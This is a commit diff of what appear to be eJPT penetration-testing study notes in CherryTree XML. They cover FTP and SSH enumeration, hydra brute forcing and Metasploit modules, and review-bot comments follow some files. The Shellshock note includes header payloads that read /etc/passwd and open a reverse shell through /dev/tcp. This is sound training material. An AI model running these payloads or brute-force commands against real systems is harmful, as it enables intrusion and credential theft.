
Commit 4ce2c97

authored
Add files via upload
1 parent 3251857 commit 4ce2c97


42 files changed

+1561
-0
lines changed

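--- a/EJPT/EJPT/1/2/10/node.xml
+++ b/EJPT/EJPT/1/2/10/node.xml
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cherrytree>
+<node name="ftp checklist" unique_id="10" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1704138836" ts_lastsave="1704138900">
+<rich_text>Is Anonymous Login Permitted?
+Were weak or default credentials being used?
+Are there known vulnerabilities with the server version?</rich_text>
+</node>
+</cherrytree>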

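--- a/EJPT/EJPT/1/2/node.xml
+++ b/EJPT/EJPT/1/2/node.xml
@@ -0,0 +1,52 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cherrytree>
+<node name="21 - FTP" unique_id="2" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1704059877" ts_lastsave="1704149195">
+<rich_text>
+check if anon login allowed:
+
+
+bruteforce default logins:
+
+
+Active/Passive
+if you receive an error about being unable to download files due to passive mode being in place simply type
+
+
+Connecting to FTP
+
+
+Download all FTP files
+
+
+**Metasploit**
+
+
+Check searchsploit and google to see if version of FTP has known vulns
+
+More Information:
+
+</rich_text>
+<rich_text link="webs https://book.hacktricks.xyz/network-services-pentesting/pentesting-ftp">https://book.hacktricks.xyz/network-services-pentesting/pentesting-ftp</rich_text>
+<rich_text>
+</rich_text>
+<rich_text link="webs https://github.com/neilmadhava/EJPTv2-Notes/blob/main/Information%20Gathering%20and%20Enumeration/FTP.md">https://github.com/neilmadhava/EJPTv2-Notes/blob/main/Information%20Gathering%20and%20Enumeration/FTP.md</rich_text>
+<rich_text>
+
+
+
+
+
+
+</rich_text>
+<codebox char_offset="30" justification="left" frame_width="500" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">nmap -p 21 &lt;ip.addr&gt; --script=ftp-anon</codebox>
+<codebox char_offset="62" justification="left" frame_width="617" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">nmap -p 21 &lt;ip.addr&gt; ftp-brute --script-args userdb=/root/users
+hydra -L user.txt -P pass.txt -V -f ip.addr ftp #hydra is better and faster</codebox>
+<codebox char_offset="191" justification="left" frame_width="500" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">ftp&gt; passive</codebox>
+<codebox char_offset="214" justification="left" frame_width="500" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">ftp ip.addr
+ftp [email protected]</codebox>
+<codebox char_offset="242" justification="left" frame_width="593" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">wget -m ftp://anonymous:[email protected] #Donwload all
+wget -m --no-passive ftp://anonymous:[email protected] #Download all</codebox>
+<codebox char_offset="260" justification="left" frame_width="500" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">search type:auxiliary name:ftp
+auxiliary/scanner/ftp/ftp_login</codebox>
+</node>
+</cherrytree>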
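Review bot: The `[email protected]` tokens in the `ftp` and both `wget` codeboxes look like the page renderer's e-mail obfuscation rather than what is committed; the `ftp://anonymous:` prefix on the first `wget` line suggests a `user@host` value was rewritten, so the committed file should be checked, because as shown those lines are not usable commands. The same artifact appears on the last `ssh -i` line of EJPT/EJPT/1/3/node.xml. Separately, the comment on the first `wget` line reads `#Donwload all` while the line below it has `#Download all`.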

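--- a/EJPT/EJPT/1/2/subnodes.lst
+++ b/EJPT/EJPT/1/2/subnodes.lst
@@ -0,0 +1 @@
+10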

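--- a/EJPT/EJPT/1/3/11/node.xml
+++ b/EJPT/EJPT/1/3/11/node.xml
@@ -0,0 +1,9 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cherrytree>
+<node name="ssh checklist" unique_id="11" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1704138923" ts_lastsave="1704138970">
+<rich_text>What version of SSH are you using?
+Could you find public / private key information?
+Could you enumerate any users?
+Are weak / default credentials being used?</rich_text>
+</node>
+</cherrytree>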

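--- a/EJPT/EJPT/1/3/node.xml
+++ b/EJPT/EJPT/1/3/node.xml
@@ -0,0 +1,59 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cherrytree>
+<node name="22 - SSH" unique_id="3" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1704060859" ts_lastsave="1704140664">
+<rich_text>Note: SSH is a pretty secure service, and is pretty hard to configure poorly. It is unlikely that this will be the initial foothold (unless you bruteforce)
+
+</rich_text>
+<rich_text underline="single" weight="heavy">Banner Grabbing</rich_text>
+<rich_text>
+</rich_text>
+<rich_text justification="left"></rich_text>
+<rich_text>
+
+</rich_text>
+<rich_text underline="single" weight="heavy">nmap scripts</rich_text>
+<rich_text>
+</rich_text>
+<rich_text justification="left"></rich_text>
+<rich_text>
+a list of known bad keys: </rich_text>
+<rich_text link="webs https://github.com/rapid7/ssh-badkeys/tree/master/authorized">https://github.com/rapid7/ssh-badkeys/tree/master/authorized</rich_text>
+<rich_text>
+
+</rich_text>
+<rich_text underline="single" weight="heavy">Bruteforcing SSH</rich_text>
+<rich_text>
+
+
+</rich_text>
+<rich_text underline="single" weight="heavy">MetaSploit Modules</rich_text>
+<rich_text>
+
+
+</rich_text>
+<rich_text underline="single" weight="heavy">SSH Tunneling</rich_text>
+<rich_text>
+If you have compromised the host via SSH, you can use this for tunneling. This is much more stable in my experience than using metasploit
+
+
+</rich_text>
+<rich_text underline="single" weight="heavy">SSH Authorized_Keys</rich_text>
+<rich_text>
+When a device has been compromised, check the user's home folders for authorized keys. This can allow you to privesc without needing a password
+
+
+</rich_text>
+<codebox char_offset="173" justification="left" frame_width="500" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">nc -vn ip.addr 22</codebox>
+<codebox char_offset="190" justification="left" frame_width="1257" frame_height="70" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">nmap -p 22 ip.addr --script=ssh2-enum-algos #enumerate algorithms used to create key
+nmap -p 22 ip.addr --script=ssh-hostkey --script-args ssh_hostkey=full # Shows the target SSH server's key fingerprint
+nmap -p 22 ip.addr --script=ssh-auth-methods --script-args="ssh.user=username" #can help you identify accounts without creds</codebox>
+<codebox char_offset="297" justification="left" frame_width="857" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">hydra -L user.txt -P pass.txt ip.addr -V -f ssh #can help you find low hanging fruit</codebox>
+<codebox char_offset="319" justification="left" frame_width="597" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">auxiliary/scanner/ssh/ssh_version
+auxiliary/scanner/ssh/ssh_login
+scanner/ssh/ssh_enumusers #a timing attack may be possible</codebox>
+<codebox char_offset="474" justification="left" frame_width="787" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">sudo ssh -L &lt;local_port&gt;:&lt;remote_host&gt;:&lt;remote_port&gt; -N -f &lt;username&gt;@ip.addr</codebox>
+<codebox char_offset="641" justification="left" frame_width="500" frame_height="70" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">cat /home/user/.ssh/authorized_keys
+#from attack box
+ssh -i authorized_keys [email protected]</codebox>
+</node>
+</cherrytree>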
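Review bot: The `sudo` on the `ssh -L` line in the SSH Tunneling codebox is only needed when `local_port` is below 1024; otherwise it runs the SSH client, and whatever key or config files it reads, as root for no benefit. A comment such as `# sudo only needed when local_port is below 1024` would make that least-privilege choice explicit. The opening sentence `SSH is a pretty secure service, and is pretty hard to configure poorly` also sits oddly beside the later Authorized_Keys section, which describes exactly such a misconfiguration; `hard to configure poorly by default` would be the more accurate wording.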

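--- a/EJPT/EJPT/1/3/subnodes.lst
+++ b/EJPT/EJPT/1/3/subnodes.lst
@@ -0,0 +1 @@
+11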

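--- a/EJPT/EJPT/1/30/node.xml
+++ b/EJPT/EJPT/1/30/node.xml
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cherrytree>
+<node name="25 - SMTP" unique_id="30" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1704149231" ts_lastsave="1704149296">
+<rich_text>**MetaSploit**
+</rich_text>
+<codebox char_offset="15" justification="left" frame_width="500" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">auxiliary/scanner/smtp/smtp_version</codebox>
+</node>
+</cherrytree>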

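--- a/EJPT/EJPT/1/31/node.xml
+++ b/EJPT/EJPT/1/31/node.xml
@@ -0,0 +1,14 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cherrytree>
+<node name="AutoPwn" unique_id="31" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1704149863" ts_lastsave="1704149956">
+<rich_text link="webs https://github.com/hahwul/metasploit-autopwn">https://github.com/hahwul/metasploit-autopwn</rich_text>
+<rich_text>
+
+</rich_text>
+<codebox char_offset="46" justification="left" frame_width="500" frame_height="85" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">load db_autopwn
+db_autopwn -h
+#example
+db_autopwn -p -R great -e -q ip.addr
+</codebox>
+</node>
+</cherrytree>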

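--- a/EJPT/EJPT/1/5/12/node.xml
+++ b/EJPT/EJPT/1/5/12/node.xml
@@ -0,0 +1,10 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cherrytree>
+<node name="web checklist" unique_id="12" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1704139410" ts_lastsave="1704139501">
+<rich_text>Did you enumerate other folders?
+Did you scan the web server versions and technologies?
+Did you view the source of every webpage?
+Did you spider the webpages?
+Did you Scan the web pages for known vulnerabilities (ZAP)?</rich_text>
+</node>
+</cherrytree>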

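--- a/EJPT/EJPT/1/5/16/node.xml
+++ b/EJPT/EJPT/1/5/16/node.xml
@@ -0,0 +1,40 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cherrytree>
+<node name="shellshock" unique_id="16" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1704141312" ts_lastsave="1704141578">
+<rich_text underline="single" weight="heavy">CVE-2014-6271</rich_text>
+<rich_text>
+
+One of the biggest Linux vulns over the last 15-20 years. Allows attacker to execute arbitrary commands via RCE.
+
+Actually a family of vulns in the bash shell that allow an attacker to execute remote code. Not very common, and you will likely not encounter it in the wild.
+
+Bash mistakenly executes trailing commands after a series of characters () { :; };
+
+Impacts CGI scripts or .sh scripts that are also vulnerable to this attack. CGI scripts are used by apache to execute arbitary commands on the linux system after which the output is displayed to the client.
+
+In order to exploit this vuln you need to locate an input vector or script that allows you to communicate. In the context of an apache web server we can utilize any legitimate CGI script accessible on the web server. When the script is executed the web server will initiate a new process and run the CGI script with bash. Can be exploited with an MSF module.
+
+To scan for this vuln you can use
+</rich_text>
+<rich_text justification="left"></rich_text>
+<rich_text>
+
+
+Now any input after () { :; }; will be interpreted by the server.
+
+example of manual exploitation:
+</rich_text>
+<rich_text justification="left"></rich_text>
+<rich_text>
+
+With Metasploit:
+</rich_text>
+<rich_text justification="left"></rich_text>
+<rich_text>
+</rich_text>
+<codebox char_offset="975" justification="left" frame_width="968" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">nmap ip.addr -sV -p 80 --script=http-shellshock --script-args="http-shellshock.uri=/script.cgi"
+auxiliary/scanner/http/apache_mod_cgi_bash_env #metasploit</codebox>
+<codebox char_offset="1078" justification="left" frame_width="1488" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">User-Agent: ()P{:;}; echo; echo; /bin/bash -c 'cat /etc/passwd' User-Agent: ()P{:;}; echo; echo; /bin/bash -c 'bash -i&gt;&amp;/dev/tcp/ip.addr/port 0&gt;&amp;1'</codebox>
+<codebox char_offset="1098" justification="left" frame_width="748" frame_height="40" width_in_pixels="1" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">exploit/multi/http/apache_mod_cgi_bash_env_exec #set RHOSTS and TARGETURI</codebox>
+</node>
+</cherrytree>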
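Review bot: The sentence `One of the biggest Linux vulns over the last 15-20 years` describes Shellshock as a Linux vulnerability, while the next paragraph correctly places it in the bash shell; any platform running an affected bash behind a CGI handler was exposed, so the first sentence should say bash rather than Linux. The `http-shellshock` nmap line in the first codebox only checks the single path passed in `http-shellshock.uri`, so a clean result for `/script.cgi` says nothing about other CGI endpoints on the host; a comment such as `# only the URI given is tested` would record that limitation next to the command. The word `arbitary` in the CGI paragraph is a typo for `arbitrary`.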
